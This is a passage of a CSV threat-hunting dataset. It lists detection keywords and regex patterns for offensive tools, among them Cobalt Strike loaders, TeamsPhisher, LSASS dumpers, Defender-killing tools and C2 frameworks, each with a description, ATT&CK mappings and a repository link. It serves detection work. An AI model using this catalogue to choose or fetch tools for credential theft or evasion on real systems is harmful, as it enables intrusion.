T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","57","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*TaskShell.exe * -s *SYSTEM*",".{0,1000}TaskShell\.exe\s.{0,1000}\s\-s\s.{0,1000}SYSTEM.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","57","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*tastypepperoni/PPLBlade*",".{0,1000}tastypepperoni\/PPLBlade.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*tastypepperoni/RunAsWinTcb*",".{0,1000}tastypepperoni\/RunAsWinTcb.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*tbMangler.py encode *",".{0,1000}tbMangler\.py\sencode\s.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*tcpClient.connectTCP(*127.0.0.1*1337*",".{0,1000}tcpClient\.connectTCP\(.{0,1000}127\.0\.0\.1.{0,1000}1337.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","371","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" "*tcpreplay*",".{0,1000}tcpreplay.{0,1000}","offensive_tool_keyword","tcpreplay","Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.","T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://tcpreplay.appneta.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tcpshell.py*",".{0,1000}tcpshell\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*tdragon6/Supershell*",".{0,1000}tdragon6\/Supershell.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*TeamFiltration.exe *",".{0,1000}TeamFiltration\.exe\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration\Program.cs*",".{0,1000}TeamFiltration\\Program\.cs.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration-v*-linux-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-linux\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration-v*-macOS-arm64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-macOS\-arm64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration-v*-macOS-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-macOS\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*TeamFiltration-v*-win-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-win\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*teams_dump.py teams*",".{0,1000}teams_dump\.py\steams.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*teams_dump-main.zip*",".{0,1000}teams_dump\-main\.zip.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*teamserver* no_evasion.profile*",".{0,1000}teamserver.{0,1000}\sno_evasion\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*teamServer*ZoomAPI.py*",".{0,1000}teamServer.{0,1000}ZoomAPI\.py.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*TeamServer.C2Profiles*",".{0,1000}TeamServer\.C2Profiles.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer.exe *github.com*",".{0,1000}TeamServer\.exe\s.{0,1000}github\.com.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*TeamServer.prop*",".{0,1000}TeamServer\.prop.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*TeamServer/Filters/InjectionFilters*",".{0,1000}TeamServer\/Filters\/InjectionFilters.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer/Pivots/*.*",".{0,1000}TeamServer\/Pivots\/.{0,1000}\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer\TeamServer.*",".{0,1000}TeamServer\\TeamServer\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamsPhisher.git*",".{0,1000}TeamsPhisher\.git.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*teamsphisher.log*",".{0,1000}teamsphisher\.log.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*teamsphisher.py*",".{0,1000}teamsphisher\.py.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*TeamsPhisher-main.zip*",".{0,1000}TeamsPhisher\-main\.zip.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*teamstracker-main*",".{0,1000}teamstracker\-main.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*teamviewer_passwords.*",".{0,1000}teamviewer_passwords\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*teamviewer_passwords.rb*",".{0,1000}teamviewer_passwords\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*TeamViewerDecrypt.ps1*",".{0,1000}TeamViewerDecrypt\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Technique #1 - Chop Chop - Create/delete*",".{0,1000}Technique\s\#1\s\-\sChop\sChop\s\-\sCreate\/delete.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*techspence/Adeleginator*",".{0,1000}techspence\/Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*techspence/ScriptSentry*",".{0,1000}techspence\/ScriptSentry.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*tecknicaltom/dsniff*",".{0,1000}tecknicaltom\/dsniff.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well)","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","178","45","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*Teensypreter.ino*",".{0,1000}Teensypreter\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*telegram2john.py*",".{0,1000}telegram2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*TelegramRAT-main*",".{0,1000}TelegramRAT\-main.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*temp*\pp.exe*",".{0,1000}temp.{0,1000}\\pp\.exe.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","0","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*temp*KillDefender*",".{0,1000}temp.{0,1000}KillDefender.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*temp*lsass_*.dmp*",".{0,1000}temp.{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*temp*whoami.txt*",".{0,1000}temp.{0,1000}whoami\.txt.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*Temp\dumpert*",".{0,1000}Temp\\dumpert.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Temp\graca.log*",".{0,1000}Temp\\graca\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*temp\stager.exe*",".{0,1000}temp\\stager\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*templates*CSExec.cs*",".{0,1000}templates.{0,1000}CSExec\.cs.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*templates*HIPS_LIPS_processes.txt*",".{0,1000}templates.{0,1000}HIPS_LIPS_processes\.txt.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*templates*reflective_assembly_minified.ps1*",".{0,1000}templates.{0,1000}reflective_assembly_minified\.ps1.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*templates/http_SCNotification.exe*",".{0,1000}templates\/http_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*templates/smb_SCNotification.exe*",".{0,1000}templates\/smb_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*tenable.com/downloads/nessus*",".{0,1000}tenable\.com\/downloads\/nessus.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Terminating Windows Defender?*",".{0,1000}Terminating\sWindows\sDefender\?.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense 